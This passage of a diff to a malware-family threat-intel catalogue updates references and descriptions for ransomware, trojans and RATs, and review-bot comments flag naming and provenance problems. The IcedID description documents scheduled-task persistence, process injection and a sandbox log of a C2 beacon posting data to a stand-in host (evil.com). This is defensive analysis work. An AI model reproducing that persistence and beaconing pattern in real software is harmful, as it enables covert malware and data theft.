Hakbit (original) had hakbit@, more recent \"KiraLock\" has kiraransom@ (among others of course).\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hakbit", + "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.carbonblack.com/2020/06/15/tau-threat-analysis-relations-to-hakbit-ransomware/", + "https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4", "http://id-ransomware.blogspot.com/2019/11/hakbit-ransomware.html", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://unit42.paloaltonetworks.com/thanos-ransomware/", "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland", + "https://blog.cyble.com/2021/06/05/prometheus-an-emerging-apt-group-using-thanos-ransomware-to-target-organizations/", + "https://unit42.paloaltonetworks.com/thanos-ransomware/", + "https://securelist.com/cis-ransomware/104452/", "https://go.recordedfuture.com/hubfs/reports/cta-2020-0610.pdf", "https://www.seqrite.com/blog/thanos-ransomware-evading-anti-ransomware-protection-with-riplace-tactic/", - "https://www.carbonblack.com/2020/06/08/tau-threat-analysis-hakbit-ransomware/" + "https://www.carbonblack.com/2020/06/08/tau-threat-analysis-hakbit-ransomware/", + "https://www.carbonblack.com/2020/06/15/tau-threat-analysis-relations-to-hakbit-ransomware/", + "https://unit42.paloaltonetworks.com/prometheus-ransomware/" ], "synonyms": [ "Thanos Ransomware" 
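Review bot: The new Hades entry cites `"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3"`, a mutable, unattributed Google Sheet that can be edited or deleted at any time and carries no authorship, which is weak provenance for a curated threat-intel reference; replace it with an archived snapshot (web.archive.org) or the report it was derived from. The Twitter ref should lose its tracking parameter: `"https://twitter.com/inversecos/status/1381477874046169089"`. The http-scheme `gold-winter` secureworks link should be https like the sibling `secureworks.com/blog` ref in the same array. The Hakbit hunk adds three Prometheus ransomware references while `synonyms` stays `["Thanos Ransomware"]`; if Prometheus is being treated as the same family, it presumably belongs in synonyms too, otherwise the refs are cross-listed without a name to search for.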
@@ -17214,21 +19707,35 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor", - "https://twitter.com/TheDFIRReport/status/1359669513520873473", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-hancitor-followup-malware/", + "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/", + "https://www.vmray.com/cyber-security-blog/hancitor-multi-step-delivery-process-malware-analysis-spotlight/", + "https://inquest.net/blog/2021/04/16/unearthing-hancitor-infrastructure", + "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/", + "https://elis531989.medium.com/dissecting-and-automating-hancitors-config-extraction-1a6ed85d99b8", + "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", + "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", + "https://pid4.io/posts/how_to_write_a_hancitor_extractor/", + "https://www.uperesia.com/hancitor-packer-demystified", + "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/", + "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", + "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/", "https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+hoilday+break/26980/", - "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", - "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", - "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", + "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", 
"https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", - "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", - "https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/", - "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", + "https://blog.group-ib.com/prometheus-tds", "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html", - "https://www.uperesia.com/hancitor-packer-demystified", - "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", - "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/" + "https://isc.sans.edu/diary/rss/27618", + "https://twitter.com/TheDFIRReport/status/1359669513520873473", + "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", + "https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/", + "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", + "https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", + "https://blog.group-ib.com/hancitor-cuba-ransomware", + "https://cyber-anubis.github.io/malware%20analysis/hancitor/" ], "synonyms": [ "Chanitor" 
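Review bot: Most of the Hancitor hunk removes and re-adds unchanged URLs (the Unit 42 vb-dropper, pythons-and-unicorns, fireeye chanit, zscaler, minerva, uperesia, proofpoint and walmart refs all appear once with `-` and once with `+`), so the genuinely new references are buried in a reordering diff that a reviewer cannot audit line by line. The refs array seems to be emitted in an unstable order by the generator; sorting it deterministically (or preserving the prior order and appending) would make future commits show only real additions. This also applies to the GratefulPOS and GlobeImposter hunks in this commit.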
@@ -17280,6 +19787,20 @@ "uuid": "619b9665-dac2-47a8-bf7d-942809439c12", "value": "Harnig" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.haron", + "https://threatpost.com/ransomware-gangs-haron-blackmatter/168212/", + "https://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b" + ], + "synonyms": [], + "type": [] + }, + "uuid": "788c44c1-d1cd-4b17-8fa9-116d682c3661", + "value": "Haron Ransomware" + }, { "description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. 
Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries.", "meta": { 
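Review bot: The new Haron entry uses `"value": "Haron Ransomware"`, while this same commit strips the " Ransomware" suffix from `"Gibberish Ransomware"` and `"HDMR Ransomware"`, so the naming convention is inconsistent within one change. Use `"value": "Haron"` and, if the suffixed form is wanted for search, put it in `"synonyms": ["Haron Ransomware"]`. The description is empty although both cited articles describe the family; a one-line description such as the relation to Avaddon/Thanos that the referenced S2W analysis title suggests would be useful, hedged to what the sources state.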
@@ -17317,16 +19838,20 @@
 "https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html",
 "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/covid-19-cybercrime-m00nd3v-hawkeye-malware-threat-actor/",
 "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
 "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/",
 "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
- "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
 "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html",
 "https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/",
 "https://www.cyberbit.com/hawkeye-malware-keylogging-technique/",
 "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/",
+ "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry",
 "https://www.secureworks.com/research/threat-profiles/gold-galleon",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "http://www.secureworks.com/research/threat-profiles/gold-galleon",
 "https://www.govcert.ch/blog/analysis-of-an-unusual-hawkeye-sample/",
+ "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html",
 "https://www.fortinet.com/blog/threat-research/hawkeye-malware-analysis.html",
 "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/"
 ],
@@ -17354,7 +19879,7 @@
 "type": []
 },
 "uuid": "d643273f-7a53-4703-bf65-95716d55a5dd",
- "value": "HDMR Ransomware"
+ "value": "HDMR"
 },
 {
 "description": "",
@@ -17390,8 +19915,14 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty",
 "https://twitter.com/fwosar/status/1359167108727332868",
 "https://id-ransomware.blogspot.com/2020/11/hellokitty-ransomware.html",
+ "https://www.bleepingcomputer.com/news/security/hellokitty-ransomware-is-targeting-vulnerable-sonicwall-devices/",
+ "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/",
+ "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
+ "https://www.cadosecurity.com/post/punk-kitty-ransom-analysing-hellokitty-ransomware-attacks",
+ "https://blog.malwarebytes.com/threat-spotlight/2021/03/hellokitty-when-cyberpunk-met-cy-purr-crime/",
+ "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html",
 "https://labs.sentinelone.com/hellokitty-ransomware-lacks-stealth-but-still-strikes-home/",
- "https://www.cadosecurity.com/post/punk-kitty-ransom-analysing-hellokitty-ransomware-attacks"
+ "https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/"
 ],
 "synonyms": [
 "KittyCrypt"
@@ -17399,7 +19930,7 @@
 "type": []
 },
 "uuid": "433c97b5-89ac-4783-a312-8bb890590ff0",
- "value": "HelloKitty"
+ "value": "HelloKitty (Windows)"
 },
 {
 "description": "",
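Review bot: The added `"http://www.secureworks.com/research/threat-profiles/gold-galleon"` in the HawkEye refs is the same page as the `https://` line directly above it, differing only in scheme, so the entry now carries a near-duplicate reference; drop the `http://` line. A normalisation step in whatever produces this list (lower-casing the host, preferring `https`, de-duplicating) would stop this class of duplicate from re-appearing on the next refresh.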
@@ -17407,6 +19938,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth",
 "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/",
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
 "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html",
 "https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability",
 "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
@@ -17484,7 +20016,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom",
 "https://blog.dcso.de/enterprise-malware-as-a-service/",
+ "https://vxhive.blogspot.com/2020/11/deep-dive-into-hermes-ransomware.html",
 "https://www.youtube.com/watch?v=9nuo-AGg4p4",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
 "https://dcso.de/2019/03/18/enterprise-malware-as-a-service",
 "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside"
 ],
@@ -17672,6 +20206,22 @@
 "uuid": "b6734ca0-599f-4992-9094-218d01ddfb3a",
 "value": "Hisoka"
 },
+ {
+ "description": "Ransomware used in a double extortion scheme, first encountered June 2021.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hive",
+ "https://www.ic3.gov/Media/News/2021/210825.pdf",
+ "https://labs.sentinelone.com/hive-attacks-analysis-of-the-human-operated-ransomware-targeting-healthcare/",
+ "https://www.netskope.com/blog/hive-ransomware-actively-targeting-hospitals",
+ "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4aaa039f-6239-46d8-850d-69e9cbd12e9e",
+ "value": "hive"
+ },
 {
 "description": "",
 "meta": {
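Review bot: The new Hive entry uses `"value": "hive"` in lower case, while every other value in this file is written as a display name (`"Hisoka"`, `"Haron Ransomware"`, `"HelloKitty (Windows)"`), so it will sort and render oddly and may fail to line up with how other galaxies spell the family; `"value": "Hive"` is the conventional form. The lower-case identifier is already preserved by the `win.hive` slug in the malpedia ref, so nothing is lost by capitalising the display name.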
@@ -17789,6 +20339,19 @@
 "uuid": "cbe47d19-2f74-4dbc-84b5-44c31518c8a7",
 "value": "HorusEyes RAT"
 },
+ {
+ "description": "Warsaw trojan is a new banking trojan based on the Hours Eyes RAT core engine.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.horus_eyes_rat",
+ "https://seguranca-informatica.pt/the-clandestine-horus-eyes-rat-from-the-underground-to-criminals-arsenal/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5a368326-d594-4a9b-94ff-7e2d41158006",
+ "value": "Horus Eyes RAT"
+ },
 {
 "description": "",
 "meta": {
@@ -17831,14 +20394,20 @@
 "https://www.youtube.com/watch?v=h3KLKCdMUUY",
 "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g",
 "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/wsh_rat.md",
+ "https://cofense.com/houdini-worm-transformed-new-phishing-attack/",
 "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated",
+ "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/",
+ "https://yoroi.company/research/threatening-within-budget-how-wsh-rat-is-abused-by-cyber-crooks/",
 "https://myonlinesecurity.co.uk/more-agenttesla-keylogger-and-nanocore-rat-in-one-bundle/",
+ "https://www.youtube.com/watch?v=XDAiS6KBDOs",
 "https://blogs.360.cn/post/APT-C-44.html",
+ "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns",
 "http://blog.morphisec.com/hworm-houdini-aka-njrat",
 "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
 "http://blogs.360.cn/post/analysis-of-apt-c-37.html",
 "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks",
- "https://cofense.com/houdini-worm-transformed-new-phishing-attack/"
+ "https://www.cadosecurity.com/post/threat-group-uses-voice-changing-software-in-espionage-attempt",
+ "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html"
 ],
 "synonyms": [
 "Hworm",
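Review bot: The inserted `"Horus Eyes RAT"` entry (uuid `5a368326-…`) is placed directly after the existing `"HorusEyes RAT"` entry (uuid `cbe47d19-…`), so what looks like one family now exists twice under two UUIDs, and anything that keys on value or uuid will treat them as unrelated malware; unless the two are intentionally distinct, the new refs belong in the existing entry, with the alternate spelling recorded under its `synonyms`. Separately, the new description `"Warsaw trojan is a new banking trojan based on the Hours Eyes RAT core engine."` has `Hours` as a typo for `Horus` and describes Warsaw rather than the entry it sits in; `"Horus Eyes RAT is a remote access trojan whose core engine is reported to underpin the Warsaw banking trojan."` keeps the same claim while describing this entry.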
@@ -17886,6 +20455,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran",
 "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
 "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
+ "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/",
 "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
 "https://www.secureworks.com/research/threat-profiles/bronze-mayfair",
@@ -18009,17 +20579,23 @@
 "value": "HxDef"
 },
 {
- "description": "",
+ "description": "HyperBro is a RAT that has been observed to target primarily within the gambling industries, though it has been spotted in other places as well. The malware typically consists of 3 or more components: a) a genuine loader typically with a signed certification b) a malicious DLL loader loaded from the former component via DLL hijacking c) an encrypted and compressed blob that decrypts to a PE-based payload which has its C2 information hardcoded within. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro",
 "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/",
 "https://blog.team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/",
 "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox",
+ "https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf",
 "https://team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/",
 "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
 "https://www.secureworks.com/research/threat-profiles/bronze-union",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
+ "https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx",
 "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia",
+ "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
+ "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html",
+ "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html",
 "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf",
 "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
 "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
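Review bot: The new HyperBro description ends with a trailing space inside the string (`…hardcoded within. "`), which survives into every consumer and will churn the line again the next time the entry is regenerated; trim it to `…hardcoded within."`. In item a), `a genuine loader typically with a signed certification` presumably means a legitimate, code-signed executable being abused for side-loading — `a legitimate, typically code-signed loader` would say that more precisely, but the author's intent should be confirmed against the cited reports before rewording.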
@@ -18031,59 +20607,123 @@
 "uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5",
 "value": "HyperBro"
 },
+ {
+ "description": "Sideloader used by EmissaryPanda",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperssl",
+ "https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Slides-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf",
+ "https://norfolkinfosec.com/emissary-panda-dll-backdoor/",
+ "https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx",
+ "https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
+ "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
+ "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html",
+ "https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Article-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf",
+ "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html",
+ "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/"
+ ],
+ "synonyms": [
+ "FOCUSFJORD",
+ "Soldier",
+ "Sysupdate"
+ ],
+ "type": []
+ },
+ "uuid": "84f43641-77bc-4dcb-a104-150e8574da22",
+ "value": "HyperSSL"
+ },
 {
 "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid",
 "https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/",
- "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware",
- "https://www.youtube.com/watch?v=wObF9n2UIAM",
- "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
- "https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims",
- "https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html",
- "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
- "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html",
- "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
- "https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/",
- "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/",
- "https://tccontre.blogspot.com/2021/01/",
- "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/",
- "https://www.group-ib.com/blog/icedid",
- "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
+ "https://team-cymru.com/blog/2021/05/19/tracking-bokbot-infrastructure/",
 "https://www.youtube.com/watch?v=7Dk7NkIbVqY",
+ "https://www.youtube.com/watch?v=wObF9n2UIAM",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/",
- "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
- "https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://ceriumnetworks.com/threat-of-the-month-icedid-malware/",
+ "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/",
+ "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/",
+ "https://www.youtube.com/watch?v=wMXD4Sv1Alw",
+ "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/",
+ "https://www.binarydefense.com/icedid-gziploader-analysis/",
+ "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html",
+ "https://github.com/Lastline-Inc/iocs-tools/tree/main/2021-07-IcedID-Part-2",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware",
+ "https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros",
+ "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7",
